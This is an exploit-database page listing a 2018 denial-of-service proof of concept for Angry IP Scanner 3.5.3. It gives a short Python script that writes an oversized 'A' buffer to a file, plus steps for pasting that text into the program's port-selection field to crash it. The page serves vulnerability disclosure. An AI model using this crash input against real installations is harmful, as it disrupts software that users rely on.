Lucene search
K

Angry IP Scanner 3.5.3 Denial Of Service

🗓️ 22 Dec 2018 00:00:00Reported by Mr Winst0nType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Angry IP Scanner 3.5.3 Denial Of Service Po

Code
`# Exploit Title: Angry IP Scanner - Denial of Service (PoC)  
# Discovery by: Mr Winst0n  
# Discovery Date: 2018-12-22  
# Vendor Homepage: https://angryip.org/  
# Software Link : https://angryip.org/download/  
# Tested Version: 3.5.3 (latest version)  
# Tested on: Kali linux  
# Vulnerability Type: Denial of Service (DoS)  
  
  
# Steps to Produce the Crash:  
# 1.- Run python code : python angryip.py  
# 2.- Open Xangry.txt and copy content to clipboard  
# 3.- Open Angry IP Scanner  
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",  
# 5.- Paste ClipBoard on "Port selection", and click on "OK",  
# 6.- Crashed  
  
  
  
#!/usr/bin/env python  
  
buffer = "\x41" * 384  
crash = buffer + "BBBB" + "CCCC"  
f = open("Xangry.txt", "w")  
f.write(crash)  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation